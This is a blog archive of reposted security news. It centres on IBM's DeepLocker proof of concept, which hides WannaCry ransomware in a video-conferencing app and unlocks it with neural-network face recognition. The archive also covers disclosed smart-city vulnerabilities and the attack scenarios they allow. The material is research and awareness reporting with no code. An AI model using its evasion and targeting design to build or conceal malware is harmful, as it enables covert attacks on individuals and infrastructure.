Category Archives: artificial intelligence

HOTforSecurity: DeepLocker: new breed of malware that uses AI to fly under the radar

IBM researchers are seeking to raise awareness that AI-powered threats are coming our way soon. To that end, they’ve created an all-new breed of malware to provide insights into how to reduce risks and deploy adequate countermeasures.

DeepLocker was showcased at Black Hat USA 2018, the hacker conference that provides security consulting, training, and briefings to hackers, corporations, and government agencies globally.

Researchers Marc Ph. Stoecklin, Jiyong Jang, and Dhilung Kirat demonstrated how a piece of malware can be specifically targeted at one person and not others by training a neural network to recognize the victim’s face. The malware is obfuscated and hidden inside a legitimate program, in this case a video conferencing app.

When the AI finds its target, it triggers the unlock key that de-obfuscates the hidden malware and executes it. For this proof of concept, they used WannaCry itself – the infamous ransomware that made headlines last year.

“What is unique about DeepLocker is that the use of AI makes the ‘trigger conditions’ to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model,” Stoecklin writes.

“The AI model is trained to behave normally unless it is presented with a specific input: the trigger conditions identifying specific victims. The neural network produces the “key” needed to unlock the attack. DeepLocker can leverage several attributes to identify its target, including visual, audio, geolocation and system-level features. As it is virtually impossible to exhaustively enumerate all possible trigger conditions for the AI model, this method would make it extremely challenging for malware analysts to reverse engineer the neural network and recover the mission-critical secrets, including the attack payload and the specifics of the target,” Stoecklin explains.

The novel method allows for three layers of concealment: target class concealment; target instance concealment; malicious intent concealment.

When launched, the video-conferencing app feeds images of the subject into the embedded AI model, while behaving normally for all others using the app at the same time on their respective terminals.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The aim of the team’s briefing is not to give bad actors ideas, but to raise awareness about the rising AI-powered threats. Defenders too also need to leverage AI to create defenses against these new types of attack, the team said.

“Current defenses will become obsolete and new defenses are needed,” the trio conclude in their presentation.



HOTforSecurity

DeepLocker: new breed of malware that uses AI to fly under the radar

IBM researchers are seeking to raise awareness that AI-powered threats are coming our way soon. To that end, they’ve created an all-new breed of malware to provide insights into how to reduce risks and deploy adequate countermeasures.

DeepLocker was showcased at Black Hat USA 2018, the hacker conference that provides security consulting, training, and briefings to hackers, corporations, and government agencies globally.

Researchers Marc Ph. Stoecklin, Jiyong Jang, and Dhilung Kirat demonstrated how a piece of malware can be specifically targeted at one person and not others by training a neural network to recognize the victim’s face. The malware is obfuscated and hidden inside a legitimate program, in this case a video conferencing app.

When the AI finds its target, it triggers the unlock key that de-obfuscates the hidden malware and executes it. For this proof of concept, they used WannaCry itself – the infamous ransomware that made headlines last year.

“What is unique about DeepLocker is that the use of AI makes the ‘trigger conditions’ to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model,” Stoecklin writes.

“The AI model is trained to behave normally unless it is presented with a specific input: the trigger conditions identifying specific victims. The neural network produces the “key” needed to unlock the attack. DeepLocker can leverage several attributes to identify its target, including visual, audio, geolocation and system-level features. As it is virtually impossible to exhaustively enumerate all possible trigger conditions for the AI model, this method would make it extremely challenging for malware analysts to reverse engineer the neural network and recover the mission-critical secrets, including the attack payload and the specifics of the target,” Stoecklin explains.

The novel method allows for three layers of concealment: target class concealment; target instance concealment; malicious intent concealment.

When launched, the video-conferencing app feeds images of the subject into the embedded AI model, while behaving normally for all others using the app at the same time on their respective terminals.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The aim of the team’s briefing is not to give bad actors ideas, but to raise awareness about the rising AI-powered threats. Defenders too also need to leverage AI to create defenses against these new types of attack, the team said.

“Current defenses will become obsolete and new defenses are needed,” the trio conclude in their presentation.

How AI Can Tame and Control Shadow IT in the Enterprise

‘Shadow IT’, usually described as “information-technology systems and solutions built and used inside organizations without explicit organizational approval”, offers cyber-criminals an easy entry point into corporate systems and is now

The post How AI Can Tame and Control Shadow IT in the Enterprise appeared first on The Cyber Security Place.

DeepLocker – AI-powered malware are already among us

Security researchers at IBM Research developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker and will present today.

What about Artificial Intelligence (AI) applied in malware development? Threat actors can use AI-powered malware to create powerful malicious codes that can evade sophisticated defenses.

Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI,” dubbed DeepLocker that is able to conceal its malicious intent until it has infected the specific target.

“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.

“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.” 

According to the IBM researcher, DeepLocker is able to avoid detection and activate itself only after specific conditions are matched.
AI-powered malware represents a privileged optional in high-targeted attacks like the ones carried out by nation-state actors.
The malicious code could be concealed in harmful applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.

“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.

“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”

deeplocker chart

The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it stealth until the victim is identified through the facial recognition. Experts pointed out that the target can be identified by matching his face with publicly available photos.

“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”

“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The IBM Research group will provider further details today more details in a live demo at the Black Hat USA security conference in Las Vegas.

Pierluigi Paganini

(Security Affairs – AI-powered malware, DeepLocker )

The post DeepLocker – AI-powered malware are already among us appeared first on Security Affairs.

Security Affairs: DeepLocker – AI-powered malware are already among us

Security researchers at IBM Research developed a “highly targeted and evasive” AI-powered malware dubbed DeepLocker and will present today.

What about Artificial Intelligence (AI) applied in malware development? Threat actors can use AI-powered malware to create powerful malicious codes that can evade sophisticated defenses.

Security researchers at IBM Research developed a “highly targeted and evasive” attack tool powered by AI,” dubbed DeepLocker that is able to conceal its malicious intent until it has infected the specific target.

“IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware.” reads a blog post published by the experts.

“This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.” 

According to the IBM researcher, DeepLocker is able to avoid detection and activate itself only after specific conditions are matched.
AI-powered malware represents a privileged optional in high-targeted attacks like the ones carried out by nation-state actors.
The malicious code could be concealed in harmful applications and select the target based on various indicators such as voice recognition, facial recognition, geolocation and other system-level features.

“DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.” continues IBM.

“What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.”

deeplocker chart

The researchers shared a proof of concept by hiding the WannaCry ransomware in a video conferencing app and keeping it stealth until the victim is identified through the facial recognition. Experts pointed out that the target can be identified by matching his face with publicly available photos.

“To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.”

“Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target,” the researchers added.

“When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.”

The IBM Research group will provider further details today more details in a live demo at the Black Hat USA security conference in Las Vegas.

Pierluigi Paganini

(Security Affairs – AI-powered malware, DeepLocker )

The post DeepLocker – AI-powered malware are already among us appeared first on Security Affairs.



Security Affairs

Researchers Developed Artificial Intelligence-Powered Stealthy Malware

Artificial Intelligence (AI) has been seen as a potential solution for automatically detecting and combating malware, and stop cyber attacks before they affect any organization. However, the same technology can also be weaponized by threat actors to power a new generation of malware that can evade even the best cyber-security defenses and infects a computer network or launch an attack only

How to Outsmart the Smart City

Today’s digital world has created new ways to keep us all informed and safe while automating our daily lives. Our phones send us alerts about weather hazards, traffic issues and lost children. We trust these systems since we have no reason not to — but that trust has been tested before.

For a tense 38 minutes in January 2018, residents of Hawaii saw the following civil alert message on their mobile devices: “BALLISTIC MISSILE THREAT INBOUND TO HAWAII. SEEK IMMEDIATE SHELTER. THIS IS NOT A DRILL.”

This false alarm was eventually attributed to human error, but what if someone intentionally caused panic using these types of systems?

Smart City View

This incident in Hawaii was part of what motivated our team of researchers from Threatcare and IBM X-Force Red to join forces and test several smart city devices, with the specific goal of investigating “supervillain-level” attacks from afar. We found 17 zero-day vulnerabilities in four smart city systems — eight of which are critical in severity. While we were prepared to dig deep to find vulnerabilities, our initial testing yielded some of the most common security issues, such as default passwords, authentication bypass and SQL injections, making us realize that smart cities are already exposed to old-school threats that should not be part of any smart environment.

So, what do smart city systems do? There are a number of different functions that smart city technology can perform — from detecting and attempting to mitigate traffic congestion to disaster detection and response to remote control of industry and public utilities.

The devices we tested fall into three categories: intelligent transportation systems, disaster management and the industrial Internet of Things (IoT). They communicate via Wi-Fi, 4G cellular, ZigBee and other communication protocols and platforms. Data generated by these systems and their sensors is fed into interfaces that tell us things about the state of our cities — like that the water level at the dam is getting too high, the radiation levels near the nuclear power plant are safe or the traffic on the highway is not too bad today.

Read the interactive white paper: The Dangers of Smart City Hacking

Smart City Vulnerable

Earlier this year, our team tested smart city systems from Libelium, Echelon and Battelle. Libelium is a manufacturer of hardware for wireless sensor networks. Echelon sells industrial IoT, embedded and building applications and manufacturing devices like networked lighting controls. Battelle is a nonprofit that develops and commercializes technology.

When we found vulnerabilities in the products these vendors produce, our team disclosed them to the vendors. All the vendors were responsive and have since issued patches and software updates to address the flaws we’ll detail here.

After we found the vulnerabilities and developed exploits to test their viabilities in an attack scenario, our team found dozens (and, in some cases, hundreds) of each vendor’s devices exposed to remote access on the internet. All we did was use common search engines like Shodan or Censys, which are accessible to anyone using a computer.

Once we located an exposed device using some standard internet searches, we were able to determine in some instances who purchased the devices and, most importantly, what they were using the devices for. We found a European country using vulnerable devices for radiation detection and a major U.S. city using them for traffic monitoring. Upon discovering these vulnerabilities, our team promptly alerted the proper authorities and agencies of these risks.

Smart City Scare

Now, here’s where “panic attacks” could become a real threat. According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic. While no evidence exists that such attacks have taken place, we have found vulnerable systems in major cities in the U.S., Europe and elsewhere.

Here are some examples we found disturbing:

  • Flood warnings (or lack thereof): Attackers could manipulate water level sensor responses to report flooding in an area where there is none — creating panic, evacuations and destabilization. Conversely, attackers could silence flood sensors to prevent warning of an actual flood event, whether caused by natural means or in combination with the destruction of a dam or water reservoir.
  • Radiation alarms: Similar to the flood scenario, attackers could trigger a radiation leak warning in the area surrounding a nuclear power plant without any actual imminent danger. The resulting panic among civilians would be heightened due to the relatively invisible nature of radiation and the difficulty in confirming danger.
  • General chaos (via traffic, gunshot reports, building alarms, emergency alarms, etc.): Pick your favorite crime action movie from the last few years, and there’s a good chance that some hacker magically controls traffic signals and reroutes vehicles. While they’re usually shown hacking into “metro traffic control” or similar systems, things in the real world can be even less complicated. If one could control a few square blocks worth of remote traffic sensors, they could create a similar gridlock effect as seen in the movies. Those gridlocks typically show up when criminals needed a few extra minutes to evade the cops or hope to send them on a wild goose chase. Controlling additional systems could enable an attacker to set off a string of building alarms or trigger gunshot sounds on audio sensors across town, further fueling panic.

In summary, the effects of vulnerable smart city devices are no laughing matter, and security around these sensors and controls must be a lot more stringent to prevent scenarios like the few we described.

The Vulnerabilities

IBM X-Force Red and Threatcare have so far discovered and disclosed 17 vulnerabilities in four smart city systems from three different vendors. The vulnerabilities are listed below in order of criticality for each vendor we tested:

Meshlium by Libelium (wireless sensor networks)

  • (4) CRITICAL — pre-authentication shell injection flaw in Meshlium (four distinct instances)

i.LON 100/i.LON SmartServer and i.LON 600 by Echelon

  • CRITICAL — i.LON 100 default configuration allows authentication bypass – CVE-2018-10627
  • CRITICAL — i.LON 100 and i.LON 600 authentication bypass flaw – CVE-2018-8859
  • HIGH — i.LON 100 and i.LON 600 default credentials
  • MEDIUM — i.LON 100 and i.LON 600 unencrypted communications – CVE-2018-8855
  • LOW — i.LON 100 and i.LON 600 plaintext passwords – CVE-2018-8851

V2I (vehicle-to-infrastructure) Hub v2.5.1 by Battelle

V2I Hub v3.0 by Battelle

The Fixes

Smart city technology spending is anticipated to hit $80 billion this year and grow to $135 billion by 2021. As smart cities become more common, the industry needs to re-examine the frameworks for these systems to design and test them with security in mind from the start.

In light of our findings, here are some recommendations to help secure smart city systems:

  • Implement IP address restrictions to connect to the smart city systems;
  • Leverage basic application scanning tools that can help identify simple flaws;
  • Safer password and API key practices can go a long way in preventing an attack;
  • Take advantage of security incident and event management (SIEM) tools to identify suspicious traffic; and
  • Hire “hackers” to test systems for software and hardware vulnerabilities. There are teams of security professionals — such as IBM X-Force Red — that are trained to “think like a hacker” and find the flaws in systems before the bad guys do.

Additionally, security researchers can continue to drive research and awareness in this space, which is what IBM X-Force Red and Threatcare intended to do with this project. Jen Savage, Mauro Paredes and I will be presenting these vulnerabilities at Black Hat 2018, and again at the DEF CON 26 Hacking Conference later this week, so check back soon for the video presentation.

For remediation and security patches, see the vendor pages listed below:

Echelon: https://www.echelon.com/company/security/security-advisories

Read the interactive white paper: The Dangers of Smart City Hacking

The post How to Outsmart the Smart City appeared first on Security Intelligence.

DeepLocker: How AI Can Power a Stealthy New Breed of Malware

With contributions from Jiyong Jang and Dhilung Kirat.

Cybersecurity is an arms race, where attackers and defenders play a constantly evolving cat-and-mouse game. Every new era of computing has served attackers with new capabilities and vulnerabilities to execute their nefarious actions.

In the PC era, we witnessed malware threats emerging from viruses and worms, and the security industry responded with antivirus software. In the web era, attacks such as cross-site request forgery (CSRF) and cross-site scripting (XSS) were challenging web applications. Now, we are in the cloud, analytics, mobile and social (CAMS) era — and advanced persistent threats (APTs) have been on the top of CIOs’ and CSOs’ minds.

But we are on the cusp of a new era: the artificial intelligence (AI) era. The shift to machine learning and AI is the next major progression in IT. However, cybercriminals are also studying AI to use it to their advantage — and weaponize it. How will the use of AI change cyberattacks? What are the characteristics of AI-powered attacks? And how can we defend against them?

At IBM Research, we are constantly studying the evolution of technologies, capabilities and techniques in order to identify and predict new threats and stay ahead of cybercriminals. One of the outcomes, which we will present at the Black Hat USA 2018 conference, is DeepLocker, a new breed of highly targeted and evasive attack tools powered by AI.

IBM Research developed DeepLocker to better understand how several existing AI models can be combined with current malware techniques to create a particularly challenging new breed of malware. This class of AI-powered evasive malware conceals its intent until it reaches a specific victim. It unleashes its malicious action as soon as the AI model identifies the target through indicators like facial recognition, geolocation and voice recognition.

You can think of this capability as similar to a sniper attack, in contrast to the “spray and pray” approach of traditional malware. DeepLocker is designed to be stealthy. It flies under the radar, avoiding detection until the precise moment it recognizes a specific target. This AI-powered malware is particularly dangerous because, like nation-state malware, it could infect millions of systems without being detected. But, unlike nation-state malware, it is feasible in the civilian and commercial realms.

A Bit of Evasive Malware History

The DeepLocker class of malware stands in stark contrast to existing evasion techniques used by malware seen in the wild. While many malware variants try to hide their presence and malicious intent, none are as effective at doing so as DeepLocker.

Let’s recap the evolution of evasive malware:

  • In the late 1980s and early 1990s, the first variants of polymorphic and metamorphic viruses were designed to disrupt and destroy data. By means of obfuscation and mutating payloads, malware authors were avoiding antivirus systems that could easily screen files for known patterns using static signatures. Consequently, the antivirus industry gradually developed static code and malware-analysis capabilities to analyze obfuscated code and infer the malicious intent of code or files running on the endpoints they protected.
  • In the 1990s, malware authors started to encrypt the malicious payload (using so-called packers), such that the malicious code would only be observable when it was decrypted into memory before its execution. The security industry responded with dynamic malware analysis, building initial versions of malware sandboxes, such as virtualized systems, in which suspicious executables (called samples) are run, their activities monitored and their nature deemed benign or malicious.
  • Of course, attackers would not give in. In the 2000s, the first forms of evasive malware — malware trying to actively avoid analysis — were captured in the wild. For example, the malware used checks to identify whether it was running in a virtualized environment and whether other processes known to run in malware sandboxes were present. If any were found, the malware would stop executing its malicious payload in order to avoid analysis and keep its secrets encrypted. This approach is still prevalent today, as a May 2018 Security Week study found that 98 percent of the malware samples analyzed uses evasive techniques to varying extents.
  • As malware sandboxes have become increasingly more sophisticated in the past few years — for example, using bare metal analysis systems, according to the Computer Security Group at the University of California, Santa Barbara, that run on real hardware and avoiding virtualization — adversaries have moved to a different strategy: targeted attacks. They section their infection routines to have an initial step to carefully inspect the environment they run in for any predefined “suspicious” features, such as usernames and security solution processes. Only if the target endpoint is found “clear” would the malware be fetched and executed, unleashing its nefarious activity. One well-known example of evasion is the Stuxnet worm, which was programmed to target and seek out only specific industrial control systems (ICS) from a particular manufacturer, and only with certain hardware and software configurations.

Nevertheless, although malware evasion keeps evolving, even very recent forms of targeted malware require predefined triggers that can be exposed by defenders by checking the code, packed code, configuration files or network activity. All of these triggers are observable to skilled malware analysts with the appropriate tools.

DeepLocker: Ultra-Targeted and Evasive Malware

DeepLocker has changed the game of malware evasion by taking a fundamentally different approach from any other current evasive and targeted malware. DeepLocker hides its malicious payload in benign carrier applications, such as a video conference software, to avoid detection by most antivirus and malware scanners.

What is unique about DeepLocker is that the use of AI makes the “trigger conditions” to unlock the attack almost impossible to reverse engineer. The malicious payload will only be unlocked if the intended target is reached. It achieves this by using a deep neural network (DNN) AI model.

The AI model is trained to behave normally unless it is presented with a specific input: the trigger conditions identifying specific victims. The neural network produces the “key” needed to unlock the attack. DeepLocker can leverage several attributes to identify its target, including visual, audio, geolocation and system-level features. As it is virtually impossible to exhaustively enumerate all possible trigger conditions for the AI model, this method would make it extremely challenging for malware analysts to reverse engineer the neural network and recover the mission-critical secrets, including the attack payload and the specifics of the target. When attackers attempt to infiltrate a target with malware, a stealthy, targeted attack needs to conceal two main components: the trigger condition(s) and the attack payload.

DeepLocker is able to leverage the “black-box” nature of the DNN AI model to conceal the trigger condition. A simple “if this, then that” trigger condition is transformed into a deep convolutional network of the AI model that is very hard to decipher. In addition to that, it is able to convert the concealed trigger condition itself into a “password” or “key” that is required to unlock the attack payload.

Technically, this method allows three layers of attack concealment. That is, given a DeepLocker AI model alone, it is extremely difficult for malware analysts to figure out what class of target it is looking for. Is it after people’s faces or some other visual clues? What specific instance of the target class is the valid trigger condition? And what is the ultimate goal of the attack payload?

DeepLocker Overview Chart
Figure 1. DeepLocker – AI-Powered Concealment

To demonstrate the implications of DeepLocker’s capabilities, we designed a proof of concept in which we camouflage a well-known ransomware (WannaCry) in a benign video conferencing application so that it remains undetected by malware analysis tools, including antivirus engines and malware sandboxes. As a triggering condition, we trained the AI model to recognize the face of a specific person to unlock the ransomware and execute on the system.

Imagine that this video conferencing application is distributed and downloaded by millions of people, which is a plausible scenario nowadays on many public platforms. When launched, the app would surreptitiously feed camera snapshots into the embedded AI model, but otherwise behave normally for all users except the intended target. When the victim sits in front of the computer and uses the application, the camera would feed their face to the app, and the malicious payload will be secretly executed, thanks to the victim’s face, which was the preprogrammed key to unlock it.

It’s important to understand that DeepLocker describes an entirely new class of malware — any number of AI models could be plugged in to find the intended victim, and different types of malware could be used as the “payload” that is hidden within the application.

DeepLocker Briefing at Black Hat USA

Alongside my colleagues Dhilung Kirat and Jiyong Jang, I will present the implications of AI-powered malware (and DeepLocker in particular) at Black Hat USA 2018. We will show how we combined open-source AI tools with straightforward evasion techniques to build a targeted, evasive and highly effective malware.

The aim of our briefing is threefold:

  1. To raise awareness that AI-powered threats like DeepLocker are coming our way very soon;
  2. To demonstrate how attackers have the capability to build stealthy malware that can circumvent defenses commonly deployed today and;
  3. To provide insights into how to reduce risks and deploy adequate countermeasures.

While a class of malware like DeepLocker has not been seen in the wild to date, these AI tools are publicly available, as are the malware techniques being employed — so it’s only a matter of time before we start seeing these tools combined by adversarial actors and cybercriminals. In fact, we would not be surprised if this type of attack were already being deployed.

The security community needs to prepare to face a new level of AI-powered attacks. We can’t, as an industry, simply wait until the attacks are found in the wild to start preparing our defenses. To borrow an analogy from the medical field, we need to examine the virus to create the “vaccine.”

To that effect, IBM Research has been studying AI-powered attacks and identified several new traits compared to traditional attacks. In particular, the increased evasiveness of AI-powered attacks challenges traditional rule-based security tools. AI can learn the rules and evade them. Moreover, AI enables new scales and speeds of attacks by acting autonomously and adaptively.

We, as defenders, also need to lean into the power of AI as we develop defenses against these new types of attack. A few areas that we should focus on immediately include the use of AI in detectors; going beyond rule-based security, reasoning and automation to enhance the effectiveness of security teams; and cyber deception to misdirect and deactivate AI-powered attacks.

Additionally, it would be beneficial to focus on monitoring and analyzing how apps behave across user devices, and flagging events when a new app is taking unexpected actions. This detection tactic could help identify these types of attacks in the future.

The post DeepLocker: How AI Can Power a Stealthy New Breed of Malware appeared first on Security Intelligence.

Most IT decision makers believe AI is the silver bullet to cybersecurity challenges

New research from ESET reveals that three in four IT decision makers (75%) believe that AI and ML are the silver bullet to solving their cybersecurity challenges. In the past year, the amount of content published in marketing materials, media and social media on the role of AI in cybersecurity has grown enormously. ESET surveyed 900 IT decision makers across the US, UK and Germany on their opinions and attitudes to AI and ML in … More

The post Most IT decision makers believe AI is the silver bullet to cybersecurity challenges appeared first on Help Net Security.

Could AI be the ‘silver bullet’ to cybersecurity?

Three quarters of IT decision makers believe AI and ML are the silver bullet to cybersecurity challenges. New research from the cybersecurity firm ESET has revealed that the recent hype surrounding AI

The post Could AI be the ‘silver bullet’ to cybersecurity? appeared first on The Cyber Security Place.

The State of Cybersecurity: A CISO and CTO Dish on AI, Emerging Threats, Crisis Leadership and More

What’s it like to spend time with two renowned leaders in the cybersecurity field? Enlightening, to say the very least.

I recently sat down to speak with Sridhar Muppidi, chief technology officer (CTO) of cloud security and identity and access management (IAM) at IBM Security, and Shamla Naidoo, global chief information security officer (CISO) at IBM. During our conversation, Muppidi and Naidoo covered topics ranging from the research and development behind Watson and the roles of artificial intelligence (AI) and blockchain in cybersecurity to advice for responding to emerging threats.

IBM Security CTO Talks AI, Orchestration and More

In addition to his role at IBM Security, Muppidi is one of 101 active IBM Fellows. He’s an executive sponsor of the IBM Australia Development Lab on the Gold Coast and encourages an open client engagement approach. As I observed him hosting a number of clients, we discussed a wide variety of cybersecurity innovations.

IBM is currently focused on bringing AI into the world in a safe manner. AI can help security teams boost their threat detection and response capabilities, minimize identity fraud, thwart insider threats and reduce false positives in application testing — to name just a few examples.

However, since adversaries have access to the same AI tools as defenders, IBM Research developed an Adversarial Robustness Toolbox to help secure AI systems from threat actors.

IBM is also developing several orchestration playbooks to ensure that the right analysts are using the right tools to perform the right tasks in the event of any security incident. Clients can experience a simulated cyberattack and practice their incident response playbooks at the IBM X-Force Command Center. These simulations help organizations understand the importance of a strong security culture, a robust response playbook and competent leadership in the face of a crisis.

Muppidi stressed that security is a team sport. For this reason, IBM created an ecosystem of vendors who work together through open interfaces and share intelligence and analytics to foster collaboration and defend against increasingly sophisticated threats.

Finally, Muppidi talked about the emergence of decentralized identity, which gives control of identity information back to users while mitigating the burden of data ownership for organizations. This is based on blockchain’s distributed ledger technology and cryptography. IBM is focused on developing open standards and enabling clients to create or participate in identity networks to solve business problems.

IBM CISO Says Size Doesn’t Matter When It Comes to Security

Naidoo is responsible for securing the entire corporation from emerging threats as the global CISO at IBM. She has the power of IBM Security technologies at her fingertips and uses them extensively in her role. I joined Shamla for two board round tables and several client meetings in Melbourne and Sydney, Australia.

These peer-level conversations exposed the following:

  • The importance of scale: Cybersecurity challenges, approaches, investments and execution are the same for all companies — both large and small. The only difference is scale. As scale increases, it’s essential to invest in the right security technologies to account for the expanded threat surface that comes with this growth.
  • Consider organizational structure: It’s also important to consider your organizational structure. While security leaders should supply all executives and line-of-business leaders with best-in-breed technologies to protect data, they should also empower them to manage their own security and compliance whenever possible through training and awareness initiatives.

These insights reflect the diversity of thinking the cybersecurity community needs to combat the rising volume of threats and protect clients from increasingly sophisticated attackers.

A Critical Advantage in the Fight for Security

Organizations that aim to deliver cybersecurity services to their own customers should be prepared to be “customer zero” with these services. This helps to ensure that the quality of offerings stands up to market scrutiny and that clients experience the best possible outcome.

By delivering the same quality of products they use to protect their own networks, industry leaders like Muppidi and Naidoo can give their clients a critical advantage in the endless battle to protect corporate and customer information from data thieves.

Read the stories in the ‘Secure Start’ blog series — and learn from others’ mistakes

The post The State of Cybersecurity: A CISO and CTO Dish on AI, Emerging Threats, Crisis Leadership and More appeared first on Security Intelligence.

An AI Chatbot and Voice Assistant for the Mobile Employee

Have a look around, and you might notice that chatbots and voice assistants have permeated our lives — bringing an air of excitement and efficiency to manual tasks and chores. Considering the amount of time and effort we expend at the office, it’s about time that assistants make their way to the workplace.

Although IT and security leaders are making ongoing strides to ensure their workers are enabled with the most cutting-edge technology, the employees they support continue to dedicate countless hours to basic tasks that could otherwise be delegated to an artificial intelligence (AI)-powered sidekick.

It can also be a struggle for workers to overcome learning curve challenges or get on-the-go help with support-related issues. Think about the number of requests and tickets that could be avoided if users had the ability to get this level of support from an AI voice assistant.

Why Mobile Employees Could Use Some Assistance

It can be frustrating trying to find a specific email or attachment when on a mobile device, oftentimes leading to multiple searches and dead ends. Think of how many times you’ve said things like, “Sure, I’ll pull that up and send it over when I get back to my laptop.”

It’s even more frustrating attempting to schedule a meeting when the organizer is forced to look up the availability of all the participants, type out the title and define an agenda. Something that is seemingly simple is anything but when put into practice.

Smartphones and tablets are designed provide everything you need in the palm of your hand, but sometimes there’s too much in front of you to know how to prioritize. Imagine the headaches that could be avoided if employees had a helper that could constantly query their emails, calendars and contacts for them and notify them when they’ve let an email response to an important person — such as their boss — slip a bit too long.

There also can be times when devices just don’t work the way they’re supposed to. Perhaps you’re having trouble figuring out how to do something, like how to reset your passcode or turn on notifications, for example. In times like these, employees want on-demand support, but without a viable alternative, they turn to their IT helpdesk team to answer the call.

Join the Aug. 23 webinar: Help is on its way! A Sidekick For Your Mobile Workforce

Say Hello to an AI-Enabled Voice Assistant

IBM MaaS360, an industry leader in unified endpoint management (UEM), is pleased to introduce MaaS360 Assistant, the latest addition to its unique assortment of AI offerings. Enabled by chat and voice, MaaS360 Assistant is available for use by mobile employees today through open beta.

Programmed to improve productivity and deliver the best possible user experience, MaaS360 Assistant is now at the ready to respond to common questions across email, corporate contacts and calendar using natural language processing (NLP) capabilities.

An Even Better MaaS360 Assistant Tomorrow

Assistant was developed with AI capabilities that enable it to learn, evolve and become more accurate over time. In fact, it’s already begun learning.

Soon, this intelligence voice assistant will deliver notifications and insights that improve user awareness and prioritization surrounding their everyday activities, making it possible to follow up with the click of a button. For example, if your boss emailed you a week ago and you haven’t responded, you’ll get a nudge.

It’ll also be able to provide expert support and guidance, eliminating the user’s need to depend on the support team to resolve common issues.

Finally, the solution will integrate with third-party enterprise apps (e.g., human resources, customer relationship management and content management). Instead of swapping between enterprise apps, users can now rely on AI and NLP capabilities to perform tasks and get information.

Get Acquainted With Assistant

MaaS360 customers with Secure Mail are all set to enable their mobile employees. Just check in with your account manager to learn how to take full advantage.

To see MaaS360 Assistant in action and learn more about what it has to offer, register for the live webinar, “Help Is On Its Way! A Sidekick for Your mobile workforce,” on Aug. 23 at 11 a.m. EST.

The post An AI Chatbot and Voice Assistant for the Mobile Employee appeared first on Security Intelligence.

AI Protects DoD Networks from Zero-Day Exploits

The Department of Defense’s network is protected from malware threats by Sharkseer, one of the top National Security Agency or

AI Protects DoD Networks from Zero-Day Exploits on Latest Hacking News.

Most organizations investing in AI, very few succeeding

Today, only one in three AI projects are succeeding, and, perhaps more importantly, it is taking businesses more than six months to go from concept to production, according to Databricks. The primary reasons behind these challenges are that 96 percent of organizations face data-related problems like silos and inconsistent datasets, and 80 percent cite significant organizational friction like lack of collaboration between data scientists and data engineers. IT executives point to unified analytics as a … More

The post Most organizations investing in AI, very few succeeding appeared first on Help Net Security.

Quantum computing revenue to hit $15 billion in 2028 due to AI, R&D, cybersecurity

Total revenue generated from quantum computing services will exceed $15 billion by 2028, forecasts ABI Research. The demand for quantum computing services will be driven by some process hungry research and development projects as well as by the emergence of several applications including advanced artificial intelligence algorithms, next-generation encryption, traffic routing and scheduling, protein synthesis, and/or the design of advanced chemicals and materials. These applications require a new processing paradigm that classical computers, bound by … More

The post Quantum computing revenue to hit $15 billion in 2028 due to AI, R&D, cybersecurity appeared first on Help Net Security.

New AI Program can Effectively Remove the Noise from a Photograph




On July 9, researchers from NVIDIA, Aalto University, and MIT unveiled a yet another AI program that can adequately expel the noise and artifacts from pictures , this AI algorithm is the first of its kind as it doesn't even require a "clean " reference picture to get it going.

To make their noise filtering AI, the researchers began by adding noise to 50,000 sets of clean pictures and then fed these sets of grainy pictures to their AI, preparing it to expel the noise to reveal a much cleaned up version of the photograph, one that looked relatively indistinguishable to the picture before the noise was included.

